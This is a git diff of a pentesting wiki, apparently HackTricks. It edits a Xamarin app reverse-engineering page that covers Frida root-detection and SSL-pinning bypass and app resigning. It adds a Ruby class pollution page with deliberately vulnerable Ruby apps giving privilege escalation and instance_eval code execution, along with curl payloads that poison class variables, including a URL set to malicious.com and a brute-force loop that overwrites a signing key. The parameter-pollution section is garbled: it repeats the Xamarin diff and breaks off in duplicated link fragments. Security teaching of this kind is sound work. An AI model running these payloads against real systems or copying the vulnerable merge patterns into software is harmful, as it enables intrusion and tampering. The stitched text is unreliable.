diff --git a/.gitbook/assets/image (1255).png b/.gitbook/assets/image (1255).png
new file mode 100644
index 000000000..31e0bb56c
Binary files /dev/null and b/.gitbook/assets/image (1255).png differ
diff --git a/.gitbook/assets/image (1256).png b/.gitbook/assets/image (1256).png
new file mode 100644
index 000000000..a60328f79
Binary files /dev/null and b/.gitbook/assets/image (1256).png differ
diff --git a/.gitbook/assets/image (1257).png b/.gitbook/assets/image (1257).png
new file mode 100644
index 000000000..a60328f79
Binary files /dev/null and b/.gitbook/assets/image (1257).png differ
diff --git a/.gitbook/assets/image (1258).png b/.gitbook/assets/image (1258).png
new file mode 100644
index 000000000..c1c29d55a
Binary files /dev/null and b/.gitbook/assets/image (1258).png differ
diff --git a/.gitbook/assets/image (1259).png b/.gitbook/assets/image (1259).png
new file mode 100644
index 000000000..53646c5fd
Binary files /dev/null and b/.gitbook/assets/image (1259).png differ
diff --git a/.gitbook/assets/image (1260).png b/.gitbook/assets/image (1260).png
new file mode 100644
index 000000000..486e9a99e
Binary files /dev/null and b/.gitbook/assets/image (1260).png differ
diff --git a/.gitbook/assets/image (1261).png b/.gitbook/assets/image (1261).png
new file mode 100644
index 000000000..0509b13ca
Binary files /dev/null and b/.gitbook/assets/image (1261).png differ
diff --git a/.gitbook/assets/image (1262).png b/.gitbook/assets/image (1262).png
new file mode 100644
index 000000000..341272ec7
Binary files /dev/null and b/.gitbook/assets/image (1262).png differ
diff --git a/.gitbook/assets/image (1263).png b/.gitbook/assets/image (1263).png
new file mode 100644
index 000000000..c46b4be0f
Binary files /dev/null and b/.gitbook/assets/image (1263).png differ
diff --git a/SUMMARY.md b/SUMMARY.md
index ed2b2504d..60279767a 100644
--- a/SUMMARY.md
+++ b/SUMMARY.md
@@ -570,6 +570,7 @@
* [Exploiting \_\_VIEWSTATE without knowing the secrets](pentesting-web/deserialization/exploiting-\_\_viewstate-parameter.md)
* [Python Yaml Deserialization](pentesting-web/deserialization/python-yaml-deserialization.md)
* [JNDI - Java Naming and Directory Interface & Log4Shell](pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.md)
+ * [Ruby Class Pollution](pentesting-web/deserialization/ruby-class-pollution.md)
* [Domain/Subdomain takeover](pentesting-web/domain-subdomain-takeover.md)
* [Email Injections](pentesting-web/email-injections.md)
* [File Inclusion/Path traversal](pentesting-web/file-inclusion/README.md)
diff --git a/mobile-pentesting/xamarin-apps.md b/mobile-pentesting/xamarin-apps.md
index 0db1208b2..b019d54cb 100644
--- a/mobile-pentesting/xamarin-apps.md
+++ b/mobile-pentesting/xamarin-apps.md
@@ -1,8 +1,8 @@
# Xamarin Apps
{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
+Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
@@ -15,16 +15,14 @@ Learn & practice GCP Hacking:
{% endhint %}
-This is a summary of the blog post [https://www.appknox.com/security/xamarin-reverse-engineering-a-guide-for-penetration-testers](https://www.appknox.com/security/xamarin-reverse-engineering-a-guide-for-penetration-testers)
-
## **Basic Information**
Xamarin is an **open-source platform** designed for developers to **build apps for iOS, Android, and Windows** using the .NET and C# frameworks. This platform offers access to numerous tools and extensions to create modern applications efficiently.
### Xamarin's Architecture
-- For **Android**, Xamarin integrates with Android and Java namespaces through .NET bindings, operating within the Mono execution environment alongside the Android Runtime (ART). Managed Callable Wrappers (MCW) and Android Callable Wrappers (ACW) facilitate communication between Mono and ART, both of which are built on the Linux kernel.
-- For **iOS**, applications run under the Mono runtime, utilizing full Ahead of Time (AOT) compilation to convert C# .NET code into ARM assembly language. This process runs alongside the Objective-C Runtime on a UNIX-like kernel.
+* For **Android**, Xamarin integrates with Android and Java namespaces through .NET bindings, operating within the Mono execution environment alongside the Android Runtime (ART). Managed Callable Wrappers (MCW) and Android Callable Wrappers (ACW) facilitate communication between Mono and ART, both of which are built on the Linux kernel.
+* For **iOS**, applications run under the Mono runtime, utilizing full Ahead of Time (AOT) compilation to convert C# .NET code into ARM assembly language. This process runs alongside the Objective-C Runtime on a UNIX-like kernel.
### .NET Runtime and Mono Framework
@@ -38,8 +36,8 @@ Decompilation transforms compiled code back into source code. In Windows, the Mo
#### JIT vs AOT Compilation
-- **Android** supports Just-In-Time (JIT) and Ahead-Of-Time (AOT) compilation, with a Hybrid AOT mode for optimal execution speed. Full AOT is exclusive to Enterprise licenses.
-- **iOS** solely employs AOT compilation due to Apple's restrictions on dynamic code execution.
+* **Android** supports Just-In-Time (JIT) and Ahead-Of-Time (AOT) compilation, with a Hybrid AOT mode for optimal execution speed. Full AOT is exclusive to Enterprise licenses.
+* **iOS** solely employs AOT compilation due to Apple's restrictions on dynamic code execution.
### Extracting dll Files from APK/IPA
@@ -49,7 +47,8 @@ To access the assemblies in an APK/IPA, unzip the file and explore the assemblie
python3 xamarin-decompress.py -o /path/to/decompressed/apk
```
-For assembly blobs in Android, [pyxamstore](https://github.com/jakev/pyxamstore) can unpack them.
+In cases where after decompiling the APK it's possible to see the unknown/assemblies/ folder with the `.dll` files inside it, so it's posible to use [**dnSpy**](https://github.com/dnSpy/dnSpy) directly over the `.dlls` to analyze them.\
+However, sometimes, it's found the `assemblies.blob` and `assemblies.manifest` files inside the unknown/assemblies/ folder. The tool [pyxamstore](https://github.com/jakev/pyxamstore) can be used for unpacking the `assemblies.blob` file in Xamarin apps, allowing access to the .NET assemblies for further analysis:
```bash
pyxamstore unpack -d /path/to/decompressed/apk/assemblies/
@@ -57,6 +56,11 @@ pyxamstore unpack -d /path/to/decompressed/apk/assemblies/
iOS dll files are readily accessible for decompilation, revealing significant portions of the application code, which often shares a common base across different platforms.
+### Static Analysis
+
+Once the `.dll`s are obtained it's possible to analyze the .Net code statically using tools such as [**dnSpy**](https://github.com/dnSpy/dnSpy) **or** [**ILSpy**](https://github.com/icsharpcode/ILSpy) **t**hat will allow to modify the code of the app. This can be super useful to tamper the application to bypass protections for example.\
+Note that after modifying the app you will need to pack it back again and sign it again.
+
### Dynamic Analysis
Dynamic analysis involves checking for SSL pinning and using tools like [Fridax](https://github.com/NorthwaveSecurity/fridax) for runtime modifications of the .NET binary in Xamarin apps. Frida scripts are available to bypass root detection or SSL pinning, enhancing analysis capabilities.
@@ -67,14 +71,19 @@ Other interesting Frida scripts:
* [**xamarin-root-detect-bypass**](https://codeshare.frida.re/@nuschpl/xamarin-root-detect-bypass/)
* [**Frida-xamarin-unpin**](https://github.com/GoSecure/frida-xamarin-unpin)
+### Resigning
+
+The tool [Uber APK Signer](https://github.com/patrickfav/uber-apk-signer) simplifies signing multiple APKs with the same key, and can be used to resign an app after changes have been performed to it.
## Further information
+
* [https://www.appknox.com/security/xamarin-reverse-engineering-a-guide-for-penetration-testers](https://www.appknox.com/security/xamarin-reverse-engineering-a-guide-for-penetration-testers)
* [https://thecobraden.com/posts/unpacking\_xamarin\_assembly\_stores/](https://thecobraden.com/posts/unpacking\_xamarin\_assembly\_stores/)
+* [https://medium.com/@justmobilesec/introduction-to-the-exploitation-of-xamarin-apps-fde4619a51bf](https://medium.com/@justmobilesec/introduction-to-the-exploitation-of-xamarin-apps-fde4619a51bf)
{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
+Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
diff --git a/pentesting-web/deserialization/ruby-class-pollution.md b/pentesting-web/deserialization/ruby-class-pollution.md
new file mode 100644
index 000000000..b6a3c21ad
--- /dev/null
+++ b/pentesting-web/deserialization/ruby-class-pollution.md
@@ -0,0 +1,450 @@
+# Ruby Class Pollution
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
+
+
+
+Support HackTricks
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+
+{% endhint %}
+
+This is a summary from the post [https://blog.doyensec.com/2024/10/02/class-pollution-ruby.html](https://blog.doyensec.com/2024/10/02/class-pollution-ruby.html)
+
+## Merge on Attributes
+
+Example:
+
+```ruby
+# Code from https://blog.doyensec.com/2024/10/02/class-pollution-ruby.html
+# Comments added to exploit the merge on attributes
+require 'json'
+
+
+# Base class for both Admin and Regular users
+class Person
+
+ attr_accessor :name, :age, :details
+
+ def initialize(name:, age:, details:)
+ @name = name
+ @age = age
+ @details = details
+ end
+
+ # Method to merge additional data into the object
+ def merge_with(additional)
+ recursive_merge(self, additional)
+ end
+
+ # Authorize based on the `to_s` method result
+ def authorize
+ if to_s == "Admin"
+ puts "Access granted: #{@name} is an admin."
+ else
+ puts "Access denied: #{@name} is not an admin."
+ end
+ end
+
+ # Health check that executes all protected methods using `instance_eval`
+ def health_check
+ protected_methods().each do |method|
+ instance_eval(method.to_s)
+ end
+ end
+
+ private
+
+ # VULNERABLE FUNCTION that can be abused to merge attributes
+ def recursive_merge(original, additional, current_obj = original)
+ additional.each do |key, value|
+
+ if value.is_a?(Hash)
+ if current_obj.respond_to?(key)
+ next_obj = current_obj.public_send(key)
+ recursive_merge(original, value, next_obj)
+ else
+ new_object = Object.new
+ current_obj.instance_variable_set("@#{key}", new_object)
+ current_obj.singleton_class.attr_accessor key
+ end
+ else
+ current_obj.instance_variable_set("@#{key}", value)
+ current_obj.singleton_class.attr_accessor key
+ end
+ end
+ original
+ end
+
+ protected
+
+ def check_cpu
+ puts "CPU check passed."
+ end
+
+ def check_memory
+ puts "Memory check passed."
+ end
+end
+
+# Admin class inherits from Person
+class Admin < Person
+ def initialize(name:, age:, details:)
+ super(name: name, age: age, details: details)
+ end
+
+ def to_s
+ "Admin"
+ end
+end
+
+# Regular user class inherits from Person
+class User < Person
+ def initialize(name:, age:, details:)
+ super(name: name, age: age, details: details)
+ end
+
+ def to_s
+ "User"
+ end
+end
+
+class JSONMergerApp
+ def self.run(json_input)
+ additional_object = JSON.parse(json_input)
+
+ # Instantiate a regular user
+ user = User.new(
+ name: "John Doe",
+ age: 30,
+ details: {
+ "occupation" => "Engineer",
+ "location" => {
+ "city" => "Madrid",
+ "country" => "Spain"
+ }
+ }
+ )
+
+
+ # Perform a recursive merge, which could override methods
+ user.merge_with(additional_object)
+
+ # Authorize the user (privilege escalation vulnerability)
+ # ruby class_pollution.rb '{"to_s":"Admin","name":"Jane Doe","details":{"location":{"city":"Barcelona"}}}'
+ user.authorize
+
+ # Execute health check (RCE vulnerability)
+ # ruby class_pollution.rb '{"protected_methods":["puts 1"],"name":"Jane Doe","details":{"location":{"city":"Barcelona"}}}'
+ user.health_check
+
+ end
+end
+
+if ARGV.length != 1
+ puts "Usage: ruby class_pollution.rb 'JSON_STRING'"
+ exit
+end
+
+json_input = ARGV[0]
+JSONMergerApp.run(json_input)
+```
+
+### Explanation
+
+1. **Privilege Escalation**: The `authorize` method checks if `to_s` returns "Admin." By injecting a new `to_s` attribute through JSON, an attacker can make the `to_s` method return "Admin," granting unauthorized privileges.
+2. **Remote Code Execution**: In `health_check`, `instance_eval` executes methods listed in `protected_methods`. If an attacker injects custom method names (like `"puts 1"`), `instance_eval` will execute it, leading to **remote code execution (RCE)**.
+ 1. This is only possible because there is a **vulnerable `eval` instruction** executing the string value of that attribute.
+3. **Impact Limitation**: This vulnerability only affects individual instances, leaving other instances of `User` and `Admin` unaffected, thus limiting the scope of exploitation.
+
+### Real-World Cases
+
+### ActiveSupport’s `deep_merge`
+
+This isn't vulnerable by default but can be made vulnerable with something like:
+
+```ruby
+# Method to merge additional data into the object using ActiveSupport deep_merge
+def merge_with(other_object)
+ merged_hash = to_h.deep_merge(other_object)
+
+ merged_hash.each do |key, value|
+ self.class.attr_accessor key
+ instance_variable_set("@#{key}", value)
+ end
+
+ self
+end
+```
+
+### Hashie’s `deep_merge`
+
+Hashie’s `deep_merge` method operates directly on object attributes rather than plain hashes. It **prevents replacement of methods** with attributes in a merge with some **exceptions**: attributes that end with `_`, `!`, or `?` can still be merged into the object.
+
+Some special case is the attribute **`_`** on its own. Just `_` is an attribute that usually returns a `Mash` object. And because it's part of the **exceptions**, it's possible to modify it.
+
+Check the following example how passing `{"_": "Admin"}` one is able to bypass `_.to_s == "Admin"`:
+
+```ruby
+require 'json'
+require 'hashie'
+
+# Base class for both Admin and Regular users
+class Person < Hashie::Mash
+
+ # Method to merge additional data into the object using hashie
+ def merge_with(other_object)
+ deep_merge!(other_object)
+ self
+ end
+
+ # Authorize based on to_s
+ def authorize
+ if _.to_s == "Admin"
+ puts "Access granted: #{@name} is an admin."
+ else
+ puts "Access denied: #{@name} is not an admin."
+ end
+ end
+
+end
+
+# Admin class inherits from Person
+class Admin < Person
+ def to_s
+ "Admin"
+ end
+end
+
+# Regular user class inherits from Person
+class User < Person
+ def to_s
+ "User"
+ end
+end
+
+class JSONMergerApp
+ def self.run(json_input)
+ additional_object = JSON.parse(json_input)
+
+ # Instantiate a regular user
+ user = User.new({
+ name: "John Doe",
+ age: 30,
+ details: {
+ "occupation" => "Engineer",
+ "location" => {
+ "city" => "Madrid",
+ "country" => "Spain"
+ }
+ }
+ })
+
+ # Perform a deep merge, which could override methods
+ user.merge_with(additional_object)
+
+ # Authorize the user (privilege escalation vulnerability)
+ # Exploit: If we pass {"_": "Admin"} in the JSON, the user will be treated as an admin.
+ # Example usage: ruby hashie.rb '{"_": "Admin", "name":"Jane Doe","details":{"location":{"city":"Barcelona"}}}'
+ user.authorize
+ end
+end
+
+if ARGV.length != 1
+ puts "Usage: ruby hashie.rb 'JSON_STRING'"
+ exit
+end
+
+json_input = ARGV[0]
+JSONMergerApp.run(json_input)
+```
+
+## Poison the Classes
+
+In the following example it's possible to find the class **`Person`**, and the the clases **`Admin`** and **`Regular`** which inherits from the **`Person`** class. It also has another class called **`KeySigner`**:
+
+```ruby
+require 'json'
+require 'sinatra/base'
+require 'net/http'
+
+# Base class for both Admin and Regular users
+class Person
+ @@url = "http://default-url.com"
+
+ attr_accessor :name, :age, :details
+
+ def initialize(name:, age:, details:)
+ @name = name
+ @age = age
+ @details = details
+ end
+
+ def self.url
+ @@url
+ end
+
+ # Method to merge additional data into the object
+ def merge_with(additional)
+ recursive_merge(self, additional)
+ end
+
+ private
+
+ # Recursive merge to modify instance variables
+ def recursive_merge(original, additional, current_obj = original)
+ additional.each do |key, value|
+ if value.is_a?(Hash)
+ if current_obj.respond_to?(key)
+ next_obj = current_obj.public_send(key)
+ recursive_merge(original, value, next_obj)
+ else
+ new_object = Object.new
+ current_obj.instance_variable_set("@#{key}", new_object)
+ current_obj.singleton_class.attr_accessor key
+ end
+ else
+ current_obj.instance_variable_set("@#{key}", value)
+ current_obj.singleton_class.attr_accessor key
+ end
+ end
+ original
+ end
+end
+
+class User < Person
+ def initialize(name:, age:, details:)
+ super(name: name, age: age, details: details)
+ end
+end
+
+# A class created to simulate signing with a key, to be infected with the third gadget
+class KeySigner
+ @@signing_key = "default-signing-key"
+
+ def self.signing_key
+ @@signing_key
+ end
+
+ def sign(signing_key, data)
+ "#{data}-signed-with-#{signing_key}"
+ end
+end
+
+class JSONMergerApp < Sinatra::Base
+ # POST /merge - Infects class variables using JSON input
+ post '/merge' do
+ content_type :json
+ json_input = JSON.parse(request.body.read)
+
+ user = User.new(
+ name: "John Doe",
+ age: 30,
+ details: {
+ "occupation" => "Engineer",
+ "location" => {
+ "city" => "Madrid",
+ "country" => "Spain"
+ }
+ }
+ )
+
+ user.merge_with(json_input)
+
+ { status: 'merged' }.to_json
+ end
+
+ # GET /launch-curl-command - Activates the first gadget
+ get '/launch-curl-command' do
+ content_type :json
+
+ # This gadget makes an HTTP request to the URL stored in the User class
+ if Person.respond_to?(:url)
+ url = Person.url
+ response = Net::HTTP.get_response(URI(url))
+ { status: 'HTTP request made', url: url, response_body: response.body }.to_json
+ else
+ { status: 'Failed to access URL variable' }.to_json
+ end
+ end
+
+ # Curl command to infect User class URL:
+ # curl -X POST -H "Content-Type: application/json" -d '{"class":{"superclass":{"url":"http://example.com"}}}' http://localhost:4567/merge
+
+ # GET /sign_with_subclass_key - Signs data using the signing key stored in KeySigner
+ get '/sign_with_subclass_key' do
+ content_type :json
+
+ # This gadget signs data using the signing key stored in KeySigner class
+ signer = KeySigner.new
+ signed_data = signer.sign(KeySigner.signing_key, "data-to-sign")
+
+ { status: 'Data signed', signing_key: KeySigner.signing_key, signed_data: signed_data }.to_json
+ end
+
+ # Curl command to infect KeySigner signing key (run in a loop until successful):
+ # for i in {1..1000}; do curl -X POST -H "Content-Type: application/json" -d '{"class":{"superclass":{"superclass":{"subclasses":{"sample":{"signing_key":"injected-signing-key"}}}}}}' http://localhost:4567/merge; done
+
+ # GET /check-infected-vars - Check if all variables have been infected
+ get '/check-infected-vars' do
+ content_type :json
+
+ {
+ user_url: Person.url,
+ signing_key: KeySigner.signing_key
+ }.to_json
+ end
+
+ run! if app_file == $0
+end
+```
+
+### Poison Parent Class
+
+With this payload:
+
+{% code overflow="wrap" %}
+```bash
+curl -X POST -H "Content-Type: application/json" -d '{"class":{"superclass":{"url":"http://malicious.com"}}}' http://localhost:4567/merge
+```
+{% endcode %}
+
+It's possible to modify the value of the **`@@url`** attribute of the parent class **`Person`**.
+
+### **Poisoning Other Classes**
+
+With this payload:
+
+{% code overflow="wrap" %}
+```bash
+for i in {1..1000}; do curl -X POST -H "Content-Type: application/json" -d '{"class":{"superclass":{"superclass":{"subclasses":{"sample":{"signing_key":"injected-signing-key"}}}}}}' http://localhost:4567/merge --silent > /dev/null; done
+```
+{% endcode %}
+
+It's possible to brute-force the defined classes and at some point poison the class **`KeySigner`** modifying the value of `signing_key` by `injected-signing-key`.\
+
+
+## References
+
+* [https://blog.doyensec.com/2024/10/02/class-pollution-ruby.html](https://blog.doyensec.com/2024/10/02/class-pollution-ruby.html)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
+
+
+
+Support HackTricks
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+
+{% endhint %}
diff --git a/pentesting-web/parameter-pollution.md b/pentesting-web/parameter-pollution.md
index 8a7b0c791..3a835e647 100644
--- a/pentesting-web/parameter-pollution.md
+++ b/pentesting-web/parameter-pollution.md
@@ -1,8 +1,10 @@
# Parameter Pollution
+## Parameter Pollution
+
{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
+Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
@@ -19,66 +21,134 @@ Learn & practice GCP Hacking:
+
+
+
+
+
+1. Ignore anything after %00 in the parameter name .
+2. Handle name\[] as array .
+3. \_GET not meaning GET Method .
+4. Prefer the last parameter .
+
+### Ruby 3.3.5 and WEBrick 1.8.2
+
+
+
+1. Uses the & and ; delimiters to split parameters .
+2. Not Recognized name\[] .
+3. Prefer the first parameter .
+
+### Spring MVC 6.0.23 AND Apache Tomcat 10.1.30
+
+
+
+1. NOT Recognized name\[] .
+2. Prefer the last parameter .
## References
+
* [https://medium.com/@shahjerry33/http-parameter-pollution-its-contaminated-85edc0805654](https://medium.com/@shahjerry33/http-parameter-pollution-its-contaminated-85edc0805654)
* [https://github.com/google/google-ctf/tree/master/2023/web-under-construction/solution](https://github.com/google/google-ctf/tree/master/2023/web-under-construction/solution)
+* [https://medium.com/@0xAwali/http-parameter-pollution-in-2024-32ec1b810f89](https://medium.com/@0xAwali/http-parameter-pollution-in-2024-32ec1b810f89)
{% embed url="https://websec.nl/" %}
-
{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
+Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
{% endhint %}
-This is a summary of the blog post [https://www.appknox.com/security/xamarin-reverse-engineering-a-guide-for-penetration-testers](https://www.appknox.com/security/xamarin-reverse-engineering-a-guide-for-penetration-testers)
-
## **Basic Information**
Xamarin is an **open-source platform** designed for developers to **build apps for iOS, Android, and Windows** using the .NET and C# frameworks. This platform offers access to numerous tools and extensions to create modern applications efficiently.
### Xamarin's Architecture
-- For **Android**, Xamarin integrates with Android and Java namespaces through .NET bindings, operating within the Mono execution environment alongside the Android Runtime (ART). Managed Callable Wrappers (MCW) and Android Callable Wrappers (ACW) facilitate communication between Mono and ART, both of which are built on the Linux kernel.
-- For **iOS**, applications run under the Mono runtime, utilizing full Ahead of Time (AOT) compilation to convert C# .NET code into ARM assembly language. This process runs alongside the Objective-C Runtime on a UNIX-like kernel.
+* For **Android**, Xamarin integrates with Android and Java namespaces through .NET bindings, operating within the Mono execution environment alongside the Android Runtime (ART). Managed Callable Wrappers (MCW) and Android Callable Wrappers (ACW) facilitate communication between Mono and ART, both of which are built on the Linux kernel.
+* For **iOS**, applications run under the Mono runtime, utilizing full Ahead of Time (AOT) compilation to convert C# .NET code into ARM assembly language. This process runs alongside the Objective-C Runtime on a UNIX-like kernel.
### .NET Runtime and Mono Framework
@@ -38,8 +36,8 @@ Decompilation transforms compiled code back into source code. In Windows, the Mo
#### JIT vs AOT Compilation
-- **Android** supports Just-In-Time (JIT) and Ahead-Of-Time (AOT) compilation, with a Hybrid AOT mode for optimal execution speed. Full AOT is exclusive to Enterprise licenses.
-- **iOS** solely employs AOT compilation due to Apple's restrictions on dynamic code execution.
+* **Android** supports Just-In-Time (JIT) and Ahead-Of-Time (AOT) compilation, with a Hybrid AOT mode for optimal execution speed. Full AOT is exclusive to Enterprise licenses.
+* **iOS** solely employs AOT compilation due to Apple's restrictions on dynamic code execution.
### Extracting dll Files from APK/IPA
@@ -49,7 +47,8 @@ To access the assemblies in an APK/IPA, unzip the file and explore the assemblie
python3 xamarin-decompress.py -o /path/to/decompressed/apk
```
-For assembly blobs in Android, [pyxamstore](https://github.com/jakev/pyxamstore) can unpack them.
+In cases where after decompiling the APK it's possible to see the unknown/assemblies/ folder with the `.dll` files inside it, so it's posible to use [**dnSpy**](https://github.com/dnSpy/dnSpy) directly over the `.dlls` to analyze them.\
+However, sometimes, it's found the `assemblies.blob` and `assemblies.manifest` files inside the unknown/assemblies/ folder. The tool [pyxamstore](https://github.com/jakev/pyxamstore) can be used for unpacking the `assemblies.blob` file in Xamarin apps, allowing access to the .NET assemblies for further analysis:
```bash
pyxamstore unpack -d /path/to/decompressed/apk/assemblies/
@@ -57,6 +56,11 @@ pyxamstore unpack -d /path/to/decompressed/apk/assemblies/
iOS dll files are readily accessible for decompilation, revealing significant portions of the application code, which often shares a common base across different platforms.
+### Static Analysis
+
+Once the `.dll`s are obtained it's possible to analyze the .Net code statically using tools such as [**dnSpy**](https://github.com/dnSpy/dnSpy) **or** [**ILSpy**](https://github.com/icsharpcode/ILSpy) **t**hat will allow to modify the code of the app. This can be super useful to tamper the application to bypass protections for example.\
+Note that after modifying the app you will need to pack it back again and sign it again.
+
### Dynamic Analysis
Dynamic analysis involves checking for SSL pinning and using tools like [Fridax](https://github.com/NorthwaveSecurity/fridax) for runtime modifications of the .NET binary in Xamarin apps. Frida scripts are available to bypass root detection or SSL pinning, enhancing analysis capabilities.
@@ -67,14 +71,19 @@ Other interesting Frida scripts:
* [**xamarin-root-detect-bypass**](https://codeshare.frida.re/@nuschpl/xamarin-root-detect-bypass/)
* [**Frida-xamarin-unpin**](https://github.com/GoSecure/frida-xamarin-unpin)
+### Resigning
+
+The tool [Uber APK Signer](https://github.com/patrickfav/uber-apk-signer) simplifies signing multiple APKs with the same key, and can be used to resign an app after changes have been performed to it.
## Further information
+
* [https://www.appknox.com/security/xamarin-reverse-engineering-a-guide-for-penetration-testers](https://www.appknox.com/security/xamarin-reverse-engineering-a-guide-for-penetration-testers)
* [https://thecobraden.com/posts/unpacking\_xamarin\_assembly\_stores/](https://thecobraden.com/posts/unpacking\_xamarin\_assembly\_stores/)
+* [https://medium.com/@justmobilesec/introduction-to-the-exploitation-of-xamarin-apps-fde4619a51bf](https://medium.com/@justmobilesec/introduction-to-the-exploitation-of-xamarin-apps-fde4619a51bf)
{% hint style="success" %}
-Learn & practice AWS Hacking:
[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)
[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)
[**HackTricks Training GCP Red Team Expert (GRTE)**
[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)
[**HackTricks Training GCP Red Team Expert (GRTE)**.png)
.png)
.png)
.png)
.png)
.png)
.png)
.png)
